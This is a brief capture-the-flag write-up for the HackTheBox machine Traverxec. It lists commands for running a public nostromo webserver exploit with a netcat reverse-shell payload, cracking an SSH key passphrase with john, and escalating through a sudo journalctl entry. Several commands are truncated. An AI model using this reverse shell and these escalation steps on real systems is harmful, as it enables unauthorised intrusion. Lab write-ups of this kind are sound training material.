Traverxec @ HackTheBox

Traverxec @ HackTheBox

Traverxec is a 20-point machine on hackthebox that involves using a public exploit on the nostromo webserver, cracking the passphrase of an ssh private key and abusing a sudo entry for journalctl.


Nostromo exploit:

searchsploit nostromo
searchsploit -m exploits/multiple/remote/
python traverxec.htb 80 "nc <ip> 7000 -e /bin/sh"

Cracking the private key: ./david.key | tee david.hash
john -w=rockyou.txt david.hash

Exploiting journalctl:

stty rows 2
/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service

Share this post